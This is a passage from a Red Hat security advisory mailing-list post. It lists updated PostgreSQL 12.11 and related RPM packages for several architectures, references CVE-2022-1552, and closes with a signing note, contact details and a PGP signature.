postgresql-debuginfo-12.11-2.module+el8.4.0+15406+aeb4ae67.ppc64le.rpm  
postgresql-debugsource-12.11-2.module+el8.4.0+15406+aeb4ae67.ppc64le.rpm  
postgresql-docs-12.11-2.module+el8.4.0+15406+aeb4ae67.ppc64le.rpm  
postgresql-docs-debuginfo-12.11-2.module+el8.4.0+15406+aeb4ae67.ppc64le.rpm  
postgresql-plperl-12.11-2.module+el8.4.0+15406+aeb4ae67.ppc64le.rpm  
postgresql-plperl-debuginfo-12.11-2.module+el8.4.0+15406+aeb4ae67.ppc64le.rpm  
postgresql-plpython3-12.11-2.module+el8.4.0+15406+aeb4ae67.ppc64le.rpm  
postgresql-plpython3-debuginfo-12.11-2.module+el8.4.0+15406+aeb4ae67.ppc64le.rpm  
postgresql-pltcl-12.11-2.module+el8.4.0+15406+aeb4ae67.ppc64le.rpm  
postgresql-pltcl-debuginfo-12.11-2.module+el8.4.0+15406+aeb4ae67.ppc64le.rpm  
postgresql-server-12.11-2.module+el8.4.0+15406+aeb4ae67.ppc64le.rpm  
postgresql-server-debuginfo-12.11-2.module+el8.4.0+15406+aeb4ae67.ppc64le.rpm  
postgresql-server-devel-12.11-2.module+el8.4.0+15406+aeb4ae67.ppc64le.rpm  
postgresql-server-devel-debuginfo-12.11-2.module+el8.4.0+15406+aeb4ae67.ppc64le.rpm  
postgresql-static-12.11-2.module+el8.4.0+15406+aeb4ae67.ppc64le.rpm  
postgresql-test-12.11-2.module+el8.4.0+15406+aeb4ae67.ppc64le.rpm  
postgresql-test-debuginfo-12.11-2.module+el8.4.0+15406+aeb4ae67.ppc64le.rpm  
postgresql-upgrade-12.11-2.module+el8.4.0+15406+aeb4ae67.ppc64le.rpm  
postgresql-upgrade-debuginfo-12.11-2.module+el8.4.0+15406+aeb4ae67.ppc64le.rpm  
postgresql-upgrade-devel-12.11-2.module+el8.4.0+15406+aeb4ae67.ppc64le.rpm  
postgresql-upgrade-devel-debuginfo-12.11-2.module+el8.4.0+15406+aeb4ae67.ppc64le.rpm

s390x:  
pgaudit-1.4.0-6.module+el8.4.0+11288+c193d6d7.s390x.rpm  
pgaudit-debuginfo-1.4.0-6.module+el8.4.0+11288+c193d6d7.s390x.rpm  
pgaudit-debugsource-1.4.0-6.module+el8.4.0+11288+c193d6d7.s390x.rpm  
postgres-decoderbufs-0.10.0-2.module+el8.4.0+11288+c193d6d7.s390x.rpm  
postgres-decoderbufs-debuginfo-0.10.0-2.module+el8.4.0+11288+c193d6d7.s390x.rpm  
postgres-decoderbufs-debugsource-0.10.0-2.module+el8.4.0+11288+c193d6d7.s390x.rpm  
postgresql-12.11-2.module+el8.4.0+15406+aeb4ae67.s390x.rpm  
postgresql-contrib-12.11-2.module+el8.4.0+15406+aeb4ae67.s390x.rpm  
postgresql-contrib-debuginfo-12.11-2.module+el8.4.0+15406+aeb4ae67.s390x.rpm  
postgresql-debuginfo-12.11-2.module+el8.4.0+15406+aeb4ae67.s390x.rpm  
postgresql-debugsource-12.11-2.module+el8.4.0+15406+aeb4ae67.s390x.rpm  
postgresql-docs-12.11-2.module+el8.4.0+15406+aeb4ae67.s390x.rpm  
postgresql-docs-debuginfo-12.11-2.module+el8.4.0+15406+aeb4ae67.s390x.rpm  
postgresql-plperl-12.11-2.module+el8.4.0+15406+aeb4ae67.s390x.rpm  
postgresql-plperl-debuginfo-12.11-2.module+el8.4.0+15406+aeb4ae67.s390x.rpm  
postgresql-plpython3-12.11-2.module+el8.4.0+15406+aeb4ae67.s390x.rpm  
postgresql-plpython3-debuginfo-12.11-2.module+el8.4.0+15406+aeb4ae67.s390x.rpm  
postgresql-pltcl-12.11-2.module+el8.4.0+15406+aeb4ae67.s390x.rpm  
postgresql-pltcl-debuginfo-12.11-2.module+el8.4.0+15406+aeb4ae67.s390x.rpm  
postgresql-server-12.11-2.module+el8.4.0+15406+aeb4ae67.s390x.rpm  
postgresql-server-debuginfo-12.11-2.module+el8.4.0+15406+aeb4ae67.s390x.rpm  
postgresql-server-devel-12.11-2.module+el8.4.0+15406+aeb4ae67.s390x.rpm  
postgresql-server-devel-debuginfo-12.11-2.module+el8.4.0+15406+aeb4ae67.s390x.rpm  
postgresql-static-12.11-2.module+el8.4.0+15406+aeb4ae67.s390x.rpm  
postgresql-test-12.11-2.module+el8.4.0+15406+aeb4ae67.s390x.rpm  
postgresql-test-debuginfo-12.11-2.module+el8.4.0+15406+aeb4ae67.s390x.rpm  
postgresql-upgrade-12.11-2.module+el8.4.0+15406+aeb4ae67.s390x.rpm  
postgresql-upgrade-debuginfo-12.11-2.module+el8.4.0+15406+aeb4ae67.s390x.rpm  
postgresql-upgrade-devel-12.11-2.module+el8.4.0+15406+aeb4ae67.s390x.rpm  
postgresql-upgrade-devel-debuginfo-12.11-2.module+el8.4.0+15406+aeb4ae67.s390x.rpm

x86_64:  
pgaudit-1.4.0-6.module+el8.4.0+11288+c193d6d7.x86_64.rpm  
pgaudit-debuginfo-1.4.0-6.module+el8.4.0+11288+c193d6d7.x86_64.rpm  
pgaudit-debugsource-1.4.0-6.module+el8.4.0+11288+c193d6d7.x86_64.rpm  
postgres-decoderbufs-0.10.0-2.module+el8.4.0+11288+c193d6d7.x86_64.rpm  
postgres-decoderbufs-debuginfo-0.10.0-2.module+el8.4.0+11288+c193d6d7.x86_64.rpm  
postgres-decoderbufs-debugsource-0.10.0-2.module+el8.4.0+11288+c193d6d7.x86_64.rpm  
postgresql-12.11-2.module+el8.4.0+15406+aeb4ae67.x86_64.rpm  
postgresql-contrib-12.11-2.module+el8.4.0+15406+aeb4ae67.x86_64.rpm  
postgresql-contrib-debuginfo-12.11-2.module+el8.4.0+15406+aeb4ae67.x86_64.rpm  
postgresql-debuginfo-12.11-2.module+el8.4.0+15406+aeb4ae67.x86_64.rpm  
postgresql-debugsource-12.11-2.module+el8.4.0+15406+aeb4ae67.x86_64.rpm  
postgresql-docs-12.11-2.module+el8.4.0+15406+aeb4ae67.x86_64.rpm  
postgresql-docs-debuginfo-12.11-2.module+el8.4.0+15406+aeb4ae67.x86_64.rpm  
postgresql-plperl-12.11-2.module+el8.4.0+15406+aeb4ae67.x86_64.rpm  
postgresql-plperl-debuginfo-12.11-2.module+el8.4.0+15406+aeb4ae67.x86_64.rpm  
postgresql-plpython3-12.11-2.module+el8.4.0+15406+aeb4ae67.x86_64.rpm  
postgresql-plpython3-debuginfo-12.11-2.module+el8.4.0+15406+aeb4ae67.x86_64.rpm  
postgresql-pltcl-12.11-2.module+el8.4.0+15406+aeb4ae67.x86_64.rpm  
postgresql-pltcl-debuginfo-12.11-2.module+el8.4.0+15406+aeb4ae67.x86_64.rpm  
postgresql-server-12.11-2.module+el8.4.0+15406+aeb4ae67.x86_64.rpm  
postgresql-server-debuginfo-12.11-2.module+el8.4.0+15406+aeb4ae67.x86_64.rpm  
postgresql-server-devel-12.11-2.module+el8.4.0+15406+aeb4ae67.x86_64.rpm  
postgresql-server-devel-debuginfo-12.11-2.module+el8.4.0+15406+aeb4ae67.x86_64.rpm  
postgresql-static-12.11-2.module+el8.4.0+15406+aeb4ae67.x86_64.rpm  
postgresql-test-12.11-2.module+el8.4.0+15406+aeb4ae67.x86_64.rpm  
postgresql-test-debuginfo-12.11-2.module+el8.4.0+15406+aeb4ae67.x86_64.rpm  
postgresql-upgrade-12.11-2.module+el8.4.0+15406+aeb4ae67.x86_64.rpm  
postgresql-upgrade-debuginfo-12.11-2.module+el8.4.0+15406+aeb4ae67.x86_64.rpm  
postgresql-upgrade-devel-12.11-2.module+el8.4.0+15406+aeb4ae67.x86_64.rpm  
postgresql-upgrade-devel-debuginfo-12.11-2.module+el8.4.0+15406+aeb4ae67.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-1552  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYpgdttzjgjWX9erEAQgakw//YH7kHBKhs5ljsjOLXyYL3bNo72AOpkTb  
TQ9TWOehJYJ4qeNu/FH6o1OXb13ZJs5IdAseipFd6U/ruV7o/UT/3/X1T4kvfV7Z  
WDcy6aMvRzjXXgia54qjmVW+2446xS1cBdYp6IzbaupZ4Rkb30BadHXn4nJWqX01  
ZU/wt7R/K3IhlQhVF3+0v7i4T7SzrC4DO13Q+Nz0Sw34ccQA6RpCLGrIkZKgDY7F  
EoQ7W9zCn3t/a6n5nzkdu7uu03FGWf5mVkFRTtWUDtFXwirmRMKpil7aRiVWwFiU  
VyKQ5YgitKzwQ+nIYvpjPmzdwwQq22YghVz8rBQHpK2Mw4tbmzhExYPziwx88tdd  
IAe79Xwh30HQ5wnvTyLn2KxXZaG01xKxN2z/Wi1jxKHRa2HbDBWxU/YRrCdm1PAJ  
q7p14/PDLK1opO/oAD3qW2NEI1yEkRNmspXwe59rTQ7j5jYx4bCyE01M8BN4XaYu  
5xzS+aSjeHQ3jxmVU5iJqb8YP548f24HIsj/lXiV8zUqZpPRbIW022nSQvetoBcu  
rp5f0YeFB0uyrh2mQPZfsKuULBRt+Z3fU76XXoR3vGaLtoV3JF8uhbIxpOKNadgD  
fby1+3pMkLWTMIKZzscM3CNng3QR9DYRpo6BmH8Q+AE3HuWjiO+QDy5tfCPYZVAa  
lRcB6YF6bPA=PZmd  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Tag

#sql